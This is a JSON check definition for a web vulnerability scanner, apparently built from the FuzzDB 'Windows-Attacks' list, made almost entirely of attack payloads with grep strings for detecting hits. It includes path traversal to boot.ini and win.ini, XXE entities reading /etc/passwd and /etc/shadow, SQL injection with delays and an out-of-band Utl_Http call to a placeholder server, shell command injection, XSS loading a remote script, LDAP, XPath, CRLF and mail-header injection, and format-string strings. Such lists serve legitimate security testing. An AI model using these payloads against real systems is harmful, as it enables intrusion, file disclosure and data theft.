[
 {
  "Name": "Windows-Attacks.fuzzdb", 
  "Active": true, 
  "Scanner": 1, 
  "Payloads": [
   "A", 
   "TRUE", 
   "FALSE", 
   "0", 
   "00", 
   "1", 
   "-1", 
   "1.0", 
   "-1.0", 
   "2", 
   "-2", 
   "-20", 
   "65536", 
   "268435455", 
   "-268435455", 
   "2147483647", 
   "0xfffffff", 
   "NULL", 
   "null", 
   "\\0", 
   "\\00", 
   "<  script > < / script>", 
   "%0a", 
   "%00", 
   "+%00", 
   "\\0", 
   "\\0\\0", 
   "\\0\\0\\0", 
   "\\00", 
   "\\00\\00", 
   "\\00\\00\\00", 
   "$null", 
   "$NULL", 
   "`dir`", 
   "\\nnetstat -a%\\n", 
   "\\\"blah", 
   "|dir|", 
   "&quot;;id&quot;", 
   "dir%00", 
   "dir%00|", 
   "|dir", 
   "|dir|", 
   "?x=", 
   "?x=\"", 
   "?x=|", 
   "?x=>", 
   "/boot.ini", 
   "ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|", 
   "../../boot.ini", 
   "/../../../../../../../../%2A", 
   "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%\t25%5c..%25%5c..%00", 
   "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%\t\t25%5c..%25%5c..%255cboot.ini", 
   "/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini", 
   "../../../../../../../../conf/server.xml", 
   "C:/inetpub/wwwroot/global.asa", 
   "C:\\inetpub\\wwwroot\\global.asa", 
   "C:/boot.ini", 
   "C:\\boot.ini", 
   "../../../../../../../../../../../../localstart.asp%00", 
   "../../../../../../../../../../../../localstart.asp", 
   "../../../../../../../../../../../../boot.ini%00", 
   "../../../../../../../../../../../../boot.ini", 
   "/./././././././././././boot.ini", 
   "/../../../../../../../../../../../boot.ini%00", 
   "/../../../../../../../../../../../boot.ini", 
   "/..\\../..\\../..\\../..\\../..\\../..\\../boot.ini", 
   "/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./boot.ini", 
   "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini", 
   "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini%00", 
   "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini", 
   "/../../../../../../../../../../../boot.ini%00.html", 
   "/../../../../../../../../../../../boot.ini%00.jpg", 
   "/.../.../.../.../.../", 
   "..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini", 
   "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini", 
   "%0d%0aX-Injection-Header:%20AttackValue", 
   "!@#0%^#0##018387@#0^^**(()", 
   "%01%02%03%04%0a%0d%0aADSF", 
   "/,%ENV,/", 
   "&lt;!--#exec%20cmd=&quot;dir&quot;--&gt;", 
   "&lt;!--#exec%20cmd=&quot;dir&quot;--&gt;", 
   "%", 
   "#", 
   "*", 
   "}", 
   ";", 
   "/", 
   "\\", 
   "\\\\", 
   "\\\\/", 
   "\\\\\\\\*", 
   "\\\\\\\\?\\\\", 
   "&lt", 
   "&lt;", 
   "&LT", 
   "&LT;", 
   "<", 
   "<<", 
   "<<<", 
   "|", 
   "||", 
   "`", 
   "-", 
   "--", 
   "*|", 
   "^'", 
   "\\'", 
   "/'", 
   "@'", 
   "(')", 
   "{'}", 
   "[']", 
   "*'", 
   "#'", 
   "!'", 
   "!@#$%%^#$%#$@#$%$$@#$%^^**(()", 
   "%01%02%03%04%0a%0d%0aADSF", 
   "\\t", 
   "\"\\t\"", 
   "&#10;", 
   "&#13;", 
   "&#10;&#13;", 
   "&#13;&#10;", 
   "#xD", 
   "#xA", 
   "#xD#xA", 
   "#xA#xD", 
   "/%00/", 
   "%00/", 
   "%00", 
   "<?", 
   "%3C", 
   "%3C%3F", 
   "%60", 
   "%5C", 
   "%5C/", 
   "%7C", 
   "%00", 
   "/%2A", 
   "%2A", 
   "%2C", 
   "%20", 
   "%20|", 
   "%250a", 
   "%2500", 
   "../", 
   "%2e%2e%2f", 
   "..%u2215", 
   "..%c0%af", 
   "..%bg%qf", 
   "..\\", 
   "..%5c", 
   "..%%35c", 
   "..%255c", 
   "..%%35%63", 
   "..%25%35%63", 
   "..%u2216", 
   "&#60", 
   "&#060", 
   "&#0060", 
   "&#00060", 
   "&#000060", 
   "&#0000060", 
   "&#60;", 
   "&#060;", 
   "&#0060;", 
   "&#00060;", 
   "&#000060;", 
   "&#0000060;", 
   "&#x3c", 
   "&#x03c", 
   "&#x003c", 
   "&#x0003c", 
   "&#x00003c", 
   "&#x000003c", 
   "&#x3c;", 
   "&#x03c;", 
   "&#x003c;", 
   "&#x0003c;", 
   "&#x00003c;", 
   "&#x000003c;", 
   "&#X3c", 
   "&#X03c", 
   "&#X003c", 
   "&#X0003c", 
   "&#X00003c", 
   "&#X000003c", 
   "&#X3c;", 
   "&#X03c;", 
   "&#X003c;", 
   "&#X0003c;", 
   "&#X00003c;", 
   "&#X000003c;", 
   "&#x3C", 
   "&#x03C", 
   "&#x003C", 
   "&#x0003C", 
   "&#x00003C", 
   "&#x000003C", 
   "&#x3C;", 
   "&#x03C;", 
   "&#x003C;", 
   "&#x0003C;", 
   "&#x00003C;", 
   "&#x000003C;", 
   "&#X3C", 
   "&#X03C", 
   "&#X003C", 
   "&#X0003C", 
   "&#X00003C", 
   "&#X000003C", 
   "&#X3C;", 
   "&#X03C;", 
   "&#X003C;", 
   "&#X0003C;", 
   "&#X00003C;", 
   "&#X000003C;", 
   "\\x3c", 
   "\\x3C", 
   "\\u003c", 
   "\\u003C", 
   "something%00html", 
   "&apos;", 
   "/&apos;", 
   "\\&apos;", 
   "^&apos;", 
   "@&apos;", 
   "{&apos;}", 
   "[&apos;]", 
   "*&apos;", 
   "#&apos;", 
   "\">xxx<P>yyy", 
   "|", 
   "%7C", 
   "*|", 
   "%2A%7C", 
   "*(|(mail=*))", 
   "%2A%28%7C%28mail%3D%2A%29%29", 
   "*(|(objectclass=*))", 
   "%2A%28%7C%28objectclass%3D%2A%29%29", 
   "(", 
   "%28", 
   ")", 
   "%29", 
   "&", 
   "%26", 
   "!", 
   "%21", 
   "' or 1=1 or ''='", 
   "' or ''='", 
   "x' or 1=1 or 'x'='y", 
   "/", 
   "//", 
   "//*", 
   "*/*", 
   "@*", 
   "count(/child::node())", 
   "x' or name()='username' or 'x'='y", 
   "<name>','')); phpinfo(); exit;/*</name>", 
   "<![CDATA[<script>var n=0;while(true){n++;}</script>]]>", 
   "<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>", 
   "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>", 
   "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[' or 1=1 or ''=']]></foo>", 
   "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file://c:/boot.ini\">]><foo>&xxe;</foo>", 
   "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////etc/passwd\">]><foo>&xxe;</foo>", 
   "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////etc/shadow\">]><foo>&xxe;</foo>", 
   "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////dev/random\">]><foo>&xxe;</foo>", 
   "<xml ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>", 
   "<xml ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:alert('XSS')\"&gt;</B></I></xml><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>", 
   "<xml SRC=\"xsstest.xml\" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>", 
   "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>", 
   "'", 
   "'--", 
   "' or 1=1--", 
   "1 or 1=1--", 
   "' or 1 in (@@version)--", 
   "1 or 1 in (@@version)--", 
   "'; waitfor delay '0:30:0'--", 
   "1; waitfor delay '0:30:0'--", 
   "'||Utl_Http.request('http://<yourservername>') from dual--", 
   "1||Utl_Http.request('http://<yourservername>') from dual--", 
   "xsstest", 
   "xsstest%00\"<>'", 
   "</foo>", 
   "<foo></foo>", 
   "))))))))))", 
   "../../../../../../../../../../boot.ini", 
   "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini", 
   "../../../../../../../../../../windows/win.ini", 
   "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini", 
   "|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &", 
   "| ping -i 30 127.0.0.1 |", 
   "| ping -n 30 127.0.0.1 |", 
   "& ping -i 30 127.0.0.1 &", 
   "& ping -n 30 127.0.0.1 &", 
   "; ping 127.0.0.1 ;", 
   "%0a ping -i 30 127.0.0.1 %0a", 
   "`ping 127.0.0.1`", 
   ";echo 111111", 
   "echo 111111", 
   "response.write 111111", 
   ":response.write 111111", 
   "http://<yourservername>/", 
   "<youremail>%0aCc:<youremail>", 
   "<youremail>%0d%0aCc:<youremail>", 
   "<youremail>%0aBcc:<youremail>", 
   "<youremail>%0d%0aBcc:<youremail>", 
   "%70", 
   ".%E2%73%70", 
   "%2e0", 
   "%2e", 
   ".", 
   "?*", 
   "%20", 
   "%00", 
   "%2f", 
   "%5c", 
   "count(/child::node())", 
   "x' or name()='username' or 'x'='y", 
   "<![CDATA[<script>var n=0;while(true){n++;}</script>]]>", 
   "<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>", 
   "\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>\"", 
   "\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><foo><![CDATA[' or 1=1 or ''=']]></foo>\"", 
   "\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file://c:/boot.ini\"\">]><foo>&xxe;</foo>\"", 
   "\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:////etc/passwd\"\">]><foo>&xxe;</foo>\"", 
   "\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:////etc/shadow\"\">]><foo>&xxe;</foo>\"", 
   "\"<?xml version=\"\"1.0\"\" encoding=\"\"ISO-8859-1\"\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"\"file:////dev/random\"\">]><foo>&xxe;</foo>\"", 
   "\"<xml ID=I><X><C><![CDATA[<IMG SRC=\"\"javas]]><![CDATA[cript:alert('XSS');\"\">]]>\"", 
   "\"<xml ID=\"\"xss\"\"><I><B><IMG SRC=\"\"javas<!-- -->cript:alert('XSS')\"\"></B></I></xml><SPAN DATASRC=\"\"#xss\"\" DATAFLD=\"\"B\"\" DATAFORMATAS=\"\"HTML\"\"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\"", 
   "\"<xml SRC=\"\"xsstest.xml\"\" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\"", 
   "\"<HTML xmlns:xss><?import namespace=\"\"xss\"\" implementation=\"\"http://ha.ckers.org/xss.htc\"\"><xss:xss>XSS</xss:xss></HTML>\"", 
   "%00", 
   "NULL", 
   "null", 
   "'", 
   "\"", 
   ";", 
   "<!", 
   "-", 
   "=", 
   "+", 
   "\"", 
   "&", 
   "!", 
   "|", 
   "<", 
   ">", 
   "\"><script>alert(1)</script>", 
   "%0d", 
   "%0a", 
   "%7f", 
   "%ff", 
   "-1", 
   "other", 
   "%s%p%x%d", 
   "%99999999999s", 
   "%08x", 
   "%20d", 
   "%20n", 
   "%20x", 
   "%20s", 
   "%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d", 
   "%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i", 
   "%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o", 
   "%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u", 
   "%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x", 
   "%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X", 
   "%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a", 
   "%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A", 
   "%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e", 
   "%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E", 
   "%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f", 
   "%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F", 
   "%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g", 
   "%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G", 
   "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s", 
   "%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p", 
   "%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%", 
   "XXXXX.%p", 
   "XXXXX`perl -e 'print \".%p\" x 80'`", 
   "`perl -e 'print \".%p\" x 80'`%n"
  ], 
  "Encoder": [], 
  "UrlEncode": false, 
  "CharsToUrlEncode": "", 
  "SearchString": "", 
  "ReplaceString": "", 
  "Grep": [
   "error", 
   "Directory of", 
   "boot load"
  ], 
  "PayloadResponse": false, 
  "NotResponse": false, 
  "NotCookie": false, 
  "CaseSensitive": false, 
  "ExcludeHTTP": false, 
  "OnlyHTTP": false, 
  "IsContentType": false, 
  "ContentType": "", 
  "IsResponseCode": false, 
  "ResponseCode": "", 
  "MatchType": 1, 
  "IssueName": "Windows-Attacks.fuzzdb", 
  "IssueSeverity": "Information", 
  "IssueConfidence": "Certain", 
  "IssueDetail": "Windows-Attacks.fuzzdb\n\n<grep>", 
  "RemediationDetail": "", 
  "IssueBackground": "", 
  "RemediationBackground": ""
 }
]